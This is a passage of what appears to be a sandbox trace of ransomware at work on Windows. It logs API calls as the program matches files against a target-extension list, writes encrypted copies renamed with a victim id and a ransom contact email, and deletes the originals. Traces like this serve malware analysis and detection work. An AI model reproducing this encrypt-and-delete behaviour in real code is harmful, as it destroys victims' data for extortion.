(lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 68 [0066.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 68 [0066.763] lstrlenW (lpString=".doc") returned 4 [0066.763] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.763] lstrlenW (lpString=".docx") returned 5 [0066.764] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.770] lstrlenW (lpString=".pdf") returned 4 [0066.770] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.770] lstrlenW (lpString=".xls") returned 4 [0066.770] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.770] lstrlenW (lpString=".xlsx") returned 5 [0066.770] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.770] lstrlenW (lpString=".ppt") returned 4 [0066.770] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 68 [0066.770] lstrlenW (lpString=".zip") returned 4 [0066.770] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.770] lstrlenW (lpString=".rar") returned 4 [0066.770] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.770] lstrlenW (lpString=".bz2") returned 4 [0066.770] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.770] lstrlenW (lpString=".7z") returned 3 [0066.770] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 68 [0066.770] lstrlenW (lpString=".dbf") returned 4 [0066.770] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 68 [0066.770] lstrlenW (lpString=".1cd") returned 4 [0066.770] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 68 [0066.770] lstrlenW (lpString=".jpg") returned 4 [0066.770] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.771] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.771] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02158_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0066.771] GetLastError () returned 0x0 [0066.771] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x670, lpOverlapped=0x0) returned 1 [0066.849] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x680, lpOverlapped=0x0) returned 1 [0066.850] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.850] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.850] SetEndOfFile (hFile=0x2c0) returned 1 [0066.850] CloseHandle (hObject=0x2c0) returned 1 [0066.850] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.850] SetEndOfFile (hFile=0x2c8) returned 1 [0066.851] CloseHandle (hObject=0x2c8) returned 1 [0066.851] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.851] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02158_.wmf")) returned 1 [0066.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 68 [0066.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 68 [0066.852] lstrlenW (lpString=".doc") returned 4 [0066.852] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.852] lstrlenW (lpString=".docx") returned 5 [0066.852] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.852] lstrlenW (lpString=".pdf") returned 4 [0066.852] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.852] lstrlenW (lpString=".xls") returned 4 [0066.852] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.852] lstrlenW (lpString=".xlsx") returned 5 [0066.852] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.852] lstrlenW (lpString=".ppt") returned 4 [0066.852] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 68 [0066.852] lstrlenW (lpString=".zip") returned 4 [0066.852] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.852] lstrlenW (lpString=".rar") returned 4 [0066.852] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.852] lstrlenW (lpString=".bz2") returned 4 [0066.852] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.852] lstrlenW (lpString=".7z") returned 3 [0066.852] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 68 [0066.852] lstrlenW (lpString=".dbf") returned 4 [0066.852] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 68 [0066.852] lstrlenW (lpString=".1cd") returned 4 [0066.852] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 68 [0066.852] lstrlenW (lpString=".jpg") returned 4 [0066.852] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.853] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.853] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00236_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0066.853] GetLastError () returned 0x0 [0066.853] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xcd6, lpOverlapped=0x0) returned 1 [0066.866] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xce0, lpOverlapped=0x0) returned 1 [0066.866] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.867] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.867] SetEndOfFile (hFile=0x2c0) returned 1 [0066.867] CloseHandle (hObject=0x2c0) returned 1 [0066.867] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.867] SetEndOfFile (hFile=0x2c8) returned 1 [0066.868] CloseHandle (hObject=0x2c8) returned 1 [0066.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.868] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00236_.wmf")) returned 1 [0066.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 68 [0066.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 68 [0066.868] lstrlenW (lpString=".doc") returned 4 [0066.868] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.868] lstrlenW (lpString=".docx") returned 5 [0066.868] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.868] lstrlenW (lpString=".pdf") returned 4 [0066.868] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.868] lstrlenW (lpString=".xls") returned 4 [0066.868] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.868] lstrlenW (lpString=".xlsx") returned 5 [0066.868] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.868] lstrlenW (lpString=".ppt") returned 4 [0066.869] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 68 [0066.869] lstrlenW (lpString=".zip") returned 4 [0066.869] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.869] lstrlenW (lpString=".rar") returned 4 [0066.869] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.869] lstrlenW (lpString=".bz2") returned 4 [0066.869] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.869] lstrlenW (lpString=".7z") returned 3 [0066.869] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 68 [0066.869] lstrlenW (lpString=".dbf") returned 4 [0066.869] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 68 [0066.869] lstrlenW (lpString=".1cd") returned 4 [0066.869] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 68 [0066.869] lstrlenW (lpString=".jpg") returned 4 [0066.869] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.876] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.876] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00276_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0066.878] GetLastError () returned 0x0 [0066.878] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xbc8, lpOverlapped=0x0) returned 1 [0066.888] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xbd0, lpOverlapped=0x0) returned 1 [0066.889] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.889] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.889] SetEndOfFile (hFile=0x384) returned 1 [0066.889] CloseHandle (hObject=0x384) returned 1 [0066.889] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.889] SetEndOfFile (hFile=0x354) returned 1 [0066.890] CloseHandle (hObject=0x354) returned 1 [0066.890] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.890] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00276_.wmf")) returned 1 [0066.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 68 [0066.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 68 [0066.890] lstrlenW (lpString=".doc") returned 4 [0066.890] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.891] lstrlenW (lpString=".docx") returned 5 [0066.891] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.891] lstrlenW (lpString=".pdf") returned 4 [0066.891] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.891] lstrlenW (lpString=".xls") returned 4 [0066.891] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.891] lstrlenW (lpString=".xlsx") returned 5 [0066.891] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.891] lstrlenW (lpString=".ppt") returned 4 [0066.891] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 68 [0066.891] lstrlenW (lpString=".zip") returned 4 [0066.891] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.891] lstrlenW (lpString=".rar") returned 4 [0066.891] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.891] lstrlenW (lpString=".bz2") returned 4 [0066.891] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.891] lstrlenW (lpString=".7z") returned 3 [0066.891] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 68 [0066.891] lstrlenW (lpString=".dbf") returned 4 [0066.891] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 68 [0066.891] lstrlenW (lpString=".1cd") returned 4 [0066.891] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 68 [0066.891] lstrlenW (lpString=".jpg") returned 4 [0066.891] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.892] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.892] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00513_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0066.892] GetLastError () returned 0x0 [0066.892] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x332, lpOverlapped=0x0) returned 1 [0066.915] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x340, lpOverlapped=0x0) returned 1 [0066.916] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.916] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.916] SetEndOfFile (hFile=0x384) returned 1 [0066.916] CloseHandle (hObject=0x384) returned 1 [0066.917] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.917] SetEndOfFile (hFile=0x354) returned 1 [0066.917] CloseHandle (hObject=0x354) returned 1 [0066.917] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.917] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00513_.wmf")) returned 1 [0066.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 68 [0066.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 68 [0066.918] lstrlenW (lpString=".doc") returned 4 [0066.918] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.918] lstrlenW (lpString=".docx") returned 5 [0066.918] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.918] lstrlenW (lpString=".pdf") returned 4 [0066.918] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.918] lstrlenW (lpString=".xls") returned 4 [0066.918] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.918] lstrlenW (lpString=".xlsx") returned 5 [0066.918] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.918] lstrlenW (lpString=".ppt") returned 4 [0066.918] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 68 [0066.918] lstrlenW (lpString=".zip") returned 4 [0066.918] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.919] lstrlenW (lpString=".rar") returned 4 [0066.919] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.919] lstrlenW (lpString=".bz2") returned 4 [0066.919] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.919] lstrlenW (lpString=".7z") returned 3 [0066.919] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 68 [0066.919] lstrlenW (lpString=".dbf") returned 4 [0066.919] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 68 [0066.919] lstrlenW (lpString=".1cd") returned 4 [0066.919] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 68 [0066.919] lstrlenW (lpString=".jpg") returned 4 [0066.919] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.934] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.934] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00526_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0067.059] GetLastError () returned 0x0 [0067.059] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x34e2, lpOverlapped=0x0) returned 1 [0067.066] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x34f0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x34f0, lpOverlapped=0x0) returned 1 [0067.067] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0067.067] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0067.067] SetEndOfFile (hFile=0x2c0) returned 1 [0067.067] CloseHandle (hObject=0x2c0) returned 1 [0067.067] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.067] SetEndOfFile (hFile=0x340) returned 1 [0067.068] CloseHandle (hObject=0x340) returned 1 [0067.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.068] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00526_.wmf")) returned 1 [0067.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 68 [0067.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 68 [0067.069] lstrlenW (lpString=".doc") returned 4 [0067.069] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.069] lstrlenW (lpString=".docx") returned 5 [0067.069] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.069] lstrlenW (lpString=".pdf") returned 4 [0067.069] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.069] lstrlenW (lpString=".xls") returned 4 [0067.069] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.069] lstrlenW (lpString=".xlsx") returned 5 [0067.069] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.069] lstrlenW (lpString=".ppt") returned 4 [0067.069] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 68 [0067.069] lstrlenW (lpString=".zip") returned 4 [0067.069] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.069] lstrlenW (lpString=".rar") returned 4 [0067.069] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.070] lstrlenW (lpString=".bz2") returned 4 [0067.070] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.070] lstrlenW (lpString=".7z") returned 3 [0067.070] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 68 [0067.070] lstrlenW (lpString=".dbf") returned 4 [0067.070] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 68 [0067.070] lstrlenW (lpString=".1cd") returned 4 [0067.070] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 